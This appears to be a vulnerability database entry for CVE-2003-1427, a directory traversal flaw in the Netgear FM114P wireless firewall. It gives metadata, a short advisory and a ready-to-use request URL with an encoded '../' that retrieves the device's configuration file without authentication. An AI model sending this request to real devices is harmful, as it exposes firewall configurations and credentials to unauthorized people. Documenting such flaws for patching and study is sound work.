Netgear FM114P Wireless Firewall - File Disclosure

Author: stickler
type: remote
platform: hardware
port: 
date_added: 2003-02-10 
date_updated: 2012-10-25 
verified: 1 
codes: CVE-2003-1427;OSVDB-59549 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/6807/info

Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory.

http://<ip-or-hostname>:<port>/upnp/service/%2e%2e%2fnetgear.cfg